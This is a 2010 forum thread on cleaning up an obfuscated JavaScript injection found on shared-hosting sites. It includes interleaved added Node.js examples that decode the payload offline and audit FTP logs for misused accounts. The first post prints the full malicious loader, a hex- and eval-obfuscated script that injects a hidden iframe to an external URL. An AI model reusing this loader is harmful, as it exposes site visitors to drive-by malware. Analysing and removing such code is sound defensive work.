Found some nasty javascript embedded in my html across multiple domains

Discussion in 'Security' started by systematical, Feb 2, 2010.

  1. #1
    I found the following javascript on multiple domains on my shared hosting account. I've removed any remnants I could find. I just noticed this the other day. I am definitely going to change my passwords, but I was wondering if anyone has seen anything like this before:

    
    <script>c46d278='';r935ebef290=document;r935ebef290.write('<scr'+'ipt>function r4569f8(rf5689){return e'+c46d278+'val(rf5689); }</scr'+'ipt>');  function c461134c94r570039(r9fcf87c5e9){  var d5e7='';return (r4569f8('p'+d5e7+'arseInt')(r9fcf87c5e9,16));}function rcb3e7ac446d(r9e84868f){ function ra8e2732(){var rd81c7eb9a71=2;return rd81c7eb9a71;} var r12ae09a5cda='';r6791d='fromCh';r587192=String[r6791d+'arCode'];for(r8a86e310237=0;r8a86e310237<r9e84868f.length;r8a86e310237+=ra8e2732()){ r12ae09a5cda+=(r587192(c461134c94r570039(r9e84868f.substr(r8a86e310237,ra8e2732()))));}return r12ae09a5cda;} var r9f0e9628='3C7363726970743E69662821'+c46d278+'6D796961'+c46d278+'297B646F63756D656E742E777269746528756E65736361'+c46d278+'7065282027253363253639253636253732253631'+c46d278+'253664253635253230253665253631'+c46d278+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d278+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d278+'253734253638253265253732253666253735253665253634253238253464253631'+c46d278+'253734253638253265253732253631'+c46d278+'253665253634253666253664253238253239253261'+c46d278+'253336253330253338253334253239253262253237253333253237253230253737253639253634253734253638253364253331'+c46d278+'253335253336253230253638253635253639253637253638253734253364253333253339253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d278+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d278+'2536642536352533652729293B7D7661'+c46d278+'72206D796961'+c46d278+'3D747275653B3C2F7363726970743E';r935ebef290.write(rcb3e7ac446d(r9f0e9628));</script><script>check_content()</script>
    
    Code (markup):

     
    systematical, Feb 2, 2010 IP
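The script quoted above is a two-stage loader: it hex-decodes a string with `parseInt(pair, 16)` and `String.fromCharCode`, `document.write`s the result, and that result in turn calls `unescape()` on a `%XX`-encoded string. The `'+c46d278+'` splices are concatenations of an empty string, there only to break up byte patterns a signature scanner might match on. The following Node.js script is an added example, not code from the thread: it reproduces both decoding steps offline, without `eval`, `document.write` or a browser, so the injected markup can be read and logged rather than executed. The fragments are copied from the post; the function names `hexDecode`, `percentDecode`, `decodePayload` and `summarize` are this example's own.

```javascript
// Offline decoder for the obfuscated document.write payload quoted in post #1.
// Added example; it re-implements the script's two decoding steps statically.

// Hex payload copied from the thread, split exactly where the injected script
// splits it with "'+c46d278+'" (c46d278 is the empty string, so the pieces are
// simply joined).
const PAYLOAD_FRAGMENTS = [
  '3C7363726970743E69662821',
  '6D796961',
  '297B646F63756D656E742E777269746528756E65736361',
  '7065282027253363253639253636253732253631',
  '253664253635253230253665253631',
  '253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361',
  '25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631',
  '253734253638253265253732253666253735253665253634253238253464253631',
  '253734253638253265253732253631',
  '253665253634253666253664253238253239253261',
  '253336253330253338253334253239253262253237253333253237253230253737253639253634253734253638253364253331',
  '253335253336253230253638253635253639253637253638253734253364253333253339253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361',
  '253638253639253634253634253635253665253237253365253363253266253639253636253732253631',
  '2536642536352533652729293B7D7661',
  '72206D796961',
  '3D747275653B3C2F7363726970743E',
];

// Stage 1, the script's rcb3e7ac446d(): two hex digits at a time -> one char.
function hexDecode(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new Error('payload is not a clean even-length hex string');
  }
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Stage 2, the unescape() call inside the stage-1 output. Only %XX forms occur
// in this payload, so a minimal replacement matches what unescape() would do.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Pull the single-quoted literal handed to unescape(...) out of stage 1.
function extractUnescapeArgument(stage1) {
  const m = /unescape\(\s*'([^']*)'\s*\)/.exec(stage1);
  return m ? m[1] : null;
}

function decodePayload(fragments) {
  const stage1 = hexDecode(fragments.join(''));
  const inner = extractUnescapeArgument(stage1);
  const stage2 = inner === null ? null : percentDecode(inner);
  return { stage1, stage2 };
}

// Triage view of the final markup: hidden iframe? which external URL does it load?
function summarize(markup) {
  return {
    hiddenIframe: /<iframe[^>]*visibility\s*:\s*hidden/i.test(markup),
    srcUrl: (/src=['"]?(https?:\/\/[^'"\s>]+)/i.exec(markup) || [])[1] || null,
  };
}

const result = decodePayload(PAYLOAD_FRAGMENTS);
console.log('stage 1:', result.stage1);
console.log('stage 2:', result.stage2);
console.log('summary:', summarize(result.stage2));
```

Stage 1 is a guarded `<script>` block (`if(!myia){...}var myia=true;`, so the snippet injects only once per page even if it was appended to several files that get included together); stage 2 is a `156x39` `<iframe>` with `style='visibility:hidden'` pointing at an external `in.cgi` URL. The URL is what you want for blocking and for searching the rest of the account, and the `document.write` / `unescape` / `fromCharCode` combination is a reasonable pattern to grep for when cleaning files.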
  2. hans

    hans Well-Known Member

    #2
    Never seen it before, but I had OTHER scripts on my site before.

    make sure you have NO link exchange that includes any kind of javascript - now or in the past !!
    make sure you have NO private ads that include any kind of javascript ( except Google )!

    secure your server ALL the way including cross scripting ( install mod_security and/or snort )
    completely clean all files beyond the html files that contained your a.m. script
     
    hans, Feb 3, 2010 IP
  3. ddmd

    ddmd Peon

    #3
    Shared hosting is a problem because you can't secure properly what you don't own. Changing your passwords may help, or may not, depending on how they got in.

    As far as the js content itself, you can decrypt it at: gosu.pl/decoder/
     
    ddmd, Feb 6, 2010 IP
  4. hosting4wealth

    hosting4wealth Peon

    #4
    This code is known malicious code, which we think may have been injected through a buggy WordPress version.

    Just do a complete clean-up, upgrade any WordPress installations you have, change the admin password, and also change the hosting control panel login password once you have cleaned everything up.

    Your host can help you to clean them up entirely and then change the password for you.
     
    hosting4wealth, Feb 6, 2010 IP
  5. WeWatch

    WeWatch Active Member

    #5
    This type of code and many close variations have been the result of a virus that steals FTP login credentials from infected PCs, sends the credentials to a server which then infects the website(s).

    This virus works well with PCs that have FileZilla or CuteFTP on them as these programs store their saved login credentials in a plain text file.

    Many have had to use a different anti-virus program than what they currently had installed as this virus is very adept at evading detection from the currently installed anti-virus program.

    Good success has been achieved with one of the following: Avast, F-Prot or Kaspersky. Kaspersky doesn't play well with other AV products so you may have to uninstall your current AV if you decide to go that route.

    First, change all FTP passwords.

    Then scan all PCs with a different anti-virus program.

    Then remove the malscript from all files.

    Then, if you're blacklisted by Google, request a review.

    Post back here if you have any further questions or updates.
     
    WeWatch, Feb 18, 2010 IP
  6. systematical

    systematical Peon

    #6
    Are you aware of this virus affecting the Linux OS, specifically Ubuntu? I run Ubuntu, but I had given passwords out to other developers who use Windows...

     
    systematical, Feb 18, 2010 IP
  7. WeWatch

    WeWatch Active Member

    #7
    No. I've only seen or heard about it on Windows XP.

    So I would have them scan their PCs.

    What I like to do is set up separate FTP accounts for each person. Then I can scan the logs when a website is hacked to see whose login was used. Then I know that person has a virus or they gave out my information and should be shot.

    I'm jus' sayin'...
     
    WeWatch, Feb 18, 2010 IP
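Per-person FTP accounts only pay off if the transfer log is actually checked after an incident. The script below is an added example, not from the thread, of that check: it reads xferlog-style lines (the wu-ftpd/ProFTPD transfer log layout: date, transfer time, remote host, bytes, path, type, action flag, direction, access mode, username, service, auth method, auth uid, completion status), keeps completed uploads of web-facing files, and flags any account that wrote into several different sites within a few minutes, which is what a replayed stolen credential looks like and what one developer editing one site does not. The log lines, account names, hosts and paths are constructed for the example; the layout assumption is that paths contain no spaces.

```javascript
// Added example: find which FTP account was used to push injected files,
// using one transfer log with one account per person (WeWatch's setup).

// Constructed xferlog-style sample; names, hosts and paths are placeholders.
const SAMPLE_XFERLOG = `
Mon Feb  1 02:14:07 2010 1 198.51.100.23 8123 /home/acct/public_html/site-a.example/index.html a _ i r dev_alice ftp 0 * c
Mon Feb  1 02:14:09 2010 1 198.51.100.23 6410 /home/acct/public_html/site-b.example/index.html a _ i r dev_alice ftp 0 * c
Mon Feb  1 02:14:11 2010 1 198.51.100.23 5922 /home/acct/public_html/site-c.example/contact.html a _ i r dev_alice ftp 0 * c
Mon Feb  1 09:30:55 2010 1 203.0.113.5 2201 /home/acct/public_html/site-a.example/img/logo.png b _ i r dev_bob ftp 0 * c
Tue Feb  2 11:02:13 2010 1 203.0.113.5 8123 /home/acct/public_html/site-a.example/index.html a _ o r dev_bob ftp 0 * c
`;

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5, Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };
const WEB_FILE = /\.(html?|php|js)$/i;   // file types the injection in this thread lands in

// Parse one xferlog line; returns null for blank or malformed lines.
function parseXferlogLine(line) {
  const t = line.trim().split(/\s+/);
  if (t.length < 18 || !(t[1] in MONTHS)) return null;
  const [hh, mm, ss] = t[3].split(':').map(Number);
  return {
    when: new Date(Date.UTC(Number(t[4]), MONTHS[t[1]], Number(t[2]), hh, mm, ss)),
    host: t[6],
    bytes: Number(t[7]),
    path: t[8],
    direction: t[11],   // 'i' = upload to server, 'o' = download, 'd' = delete
    user: t[13],
    status: t[17],      // 'c' = completed, 'i' = incomplete
  };
}

// Group completed uploads of web-facing files by FTP account.
// The "site" is the directory directly under public_html.
function uploadsByAccount(logText) {
  const byUser = new Map();
  for (const line of logText.split('\n')) {
    const e = parseXferlogLine(line);
    if (!e || e.direction !== 'i' || e.status !== 'c' || !WEB_FILE.test(e.path)) continue;
    const site = (/\/public_html\/([^/]+)\//.exec(e.path) || [])[1] || '(root)';
    if (!byUser.has(e.user)) byUser.set(e.user, []);
    byUser.get(e.user).push({ when: e.when, host: e.host, site, path: e.path });
  }
  return byUser;
}

// Flag accounts that wrote web files into more than maxSites distinct sites
// inside a sliding window of windowMs milliseconds.
function suspectAccounts(byUser, maxSites = 1, windowMs = 5 * 60 * 1000) {
  const suspects = [];
  for (const [user, ups] of byUser) {
    const sorted = [...ups].sort((a, b) => a.when - b.when);
    for (let i = 0; i < sorted.length; i++) {
      const sites = new Set();
      for (let j = i; j < sorted.length && sorted[j].when - sorted[i].when <= windowMs; j++) {
        sites.add(sorted[j].site);
      }
      if (sites.size > maxSites) {
        suspects.push({
          user,
          hosts: [...new Set(sorted.map(u => u.host))],
          sites: [...sites],
          firstSeen: sorted[i].when.toISOString(),
        });
        break;
      }
    }
  }
  return suspects;
}

const suspects = suspectAccounts(uploadsByAccount(SAMPLE_XFERLOG));
for (const s of suspects) {
  console.log(`account ${s.user} from ${s.hosts.join(',')} wrote into ${s.sites.length} sites starting ${s.firstSeen}`);
}
```

On the sample, `dev_alice` is reported (three sites touched within four seconds from one address) and `dev_bob` is not (one image upload and one download). The account name tells you whose PC to scan and whose password to rotate first; the source address is what to compare against the person's usual location. The window and site count are parameters because a legitimate bulk deploy by one developer can also touch several sites, so treat a hit as the place to start looking, not as proof on its own.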